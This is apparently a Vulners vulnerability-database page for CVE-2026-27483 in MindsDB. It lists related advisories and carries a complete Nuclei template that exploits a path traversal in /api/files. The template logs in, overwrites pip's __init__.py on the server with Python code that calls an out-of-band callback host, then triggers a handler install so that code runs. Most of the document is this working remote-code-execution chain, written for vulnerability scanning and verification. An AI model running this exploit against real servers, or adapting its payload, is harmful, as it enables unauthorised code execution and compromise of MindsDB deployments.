| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for Path Traversal in Mindsdb | 6 Mar 202607:52 | – | githubexploit | |
| CVE-2026-27483 | 22 Feb 202619:31 | – | circl | |
| MindsDB 路径遍历漏洞 | 24 Feb 202600:00 | – | cnnvd | |
| CVE-2026-27483 | 24 Feb 202614:00 | – | cve | |
| CVE-2026-27483 MindsDB has Path Traversal in /api/files Leading to Remote Code Execution | 24 Feb 202614:00 | – | cvelist | |
| MindsDB 25.9.1.1 - Path Traversal | 4 May 202600:00 | – | exploitdb | |
| EUVD-2026-8466 | 24 Feb 202614:00 | – | euvd | |
| MindsDB: Path Traversal in /api/files Leading to Remote Code Execution | 24 Feb 202620:07 | – | github | |
| CVE-2026-27483 | 24 Feb 202615:21 | – | nvd | |
| CVE-2026-27483 MindsDB has Path Traversal in /api/files Leading to Remote Code Execution | 24 Feb 202614:00 | – | osv |
id: CVE-2026-27483
info:
name: MindsDB - Remote Code Execution
author: thewhiteh4t
severity: high
description: |
MindsDB < 25.9.1.1 contains a remote code execution caused by path traversal in the /api/files upload file module, letting authenticated attackers write arbitrary files and execute commands, exploit requires authentication.
impact: |
Authenticated attackers can execute arbitrary commands remotely by writing files to arbitrary paths on the server.
remediation: |
Upgrade to version 25.9.1.1 or later.
reference:
- https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
- https://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505ef
- https://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1
- https://nvd.nist.gov/vuln/detail/CVE-2026-27483
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2026-27483
epss-score: 0.11113
epss-percentile: 0.95415
cwe-id: CWE-22
metadata:
verified: true
max-request: 5
vendor: MindsDB
product: MindsDB
shodan-query: http.title:"MindsDB"
tags: cve,cve2026,mindsdb,path-traversal,rce,oast,intrusive,unauth
variables:
token: ""
username: ""
password: ""
filename: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- method: GET
path:
- "{{BaseURL}}/api/status"
extractors:
- type: regex
name: mindsdb_version
part: body
group: 1
regex:
- '"mindsdb_version":\s*"([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'
internal: true
- type: regex
name: http_auth_enabled
part: body
group: 1
regex:
- '"http_auth_enabled":\s*(true|false)'
internal: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "mindsdb_version")'
- 'compare_versions(mindsdb_version, ">= 25.4.1.0", "< 25.9.1.1")'
condition: and
internal: true
- raw:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
matchers:
- type: dsl
dsl:
- 'status_code == 200 && contains(body, "token")'
- 'status_code == 400 && contains(body, "Error in username or password")'
condition: or
internal: true
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- '{"token":\s*"([^"]+)"'
internal: true
- raw:
- |
PUT /api/files/{{filename}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9
Authorization: Bearer {{token}}
Connection: close
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="name"
{{filename}}
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="source"
{{filename}}
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="source_type"
file
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
Content-Type: text/plain
import urllib.request
urllib.request.urlopen('http://{{interactsh-url}}')
------WebKitFormBoundaryv9dZC0cAHLlHSHD9--
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains(body, "Not supported format")'
condition: and
internal: true
- raw:
- |
POST /api/handlers/anomaly_detection/install HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(body, "Failed to install dependencies")'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/api/status"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "mindsdb_version"
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 490a00463044022009a0d626f66a4c2fa04a6e9ca5424dae99fb5fe6f4a03404748159e896b5428d02206a277baff2bd30ea56bdabd1785d2bdf24928821449c713068951b8baf606978:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation